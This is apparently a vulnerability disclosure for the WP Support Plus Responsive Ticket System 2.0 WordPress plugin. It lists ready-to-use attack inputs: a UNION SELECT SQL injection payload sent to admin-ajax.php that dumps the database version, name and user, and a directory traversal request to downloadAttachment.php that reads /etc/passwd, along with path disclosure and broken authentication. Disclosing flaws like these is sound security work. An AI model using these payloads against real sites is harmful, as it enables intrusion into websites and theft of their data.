WordPress WP Support Plus Responsive Ticket System 2.0 Plugin – Multiple Vulnerabilities
This plugin adds to WordPress the features of a complete ticket system with 100% responsive and 100% Ajax functionality. This allows users to submit tickets to report problems or get support on whatever they want. Users can set the status, priority and category of each ticket. SQL Injection can be done by sending a POST request to admin-ajax.php with action=openTicket&ticket_id=-1 UNION SELECT concat_ws(0x3a,version(),database(),user()),2,3,4,5,6,7. Full Path Disclosure can be done by sending a GET request to downloadAttachment.php with path=/var/www/wp-content/uploads/2014/09/file.pdf or path=. Directory Traversal can be done by sending a GET request to downloadAttachment.php with path=/etc/passwd. Broken Authentication can be done by sending a GET request to downloadAttachment.php with any file path.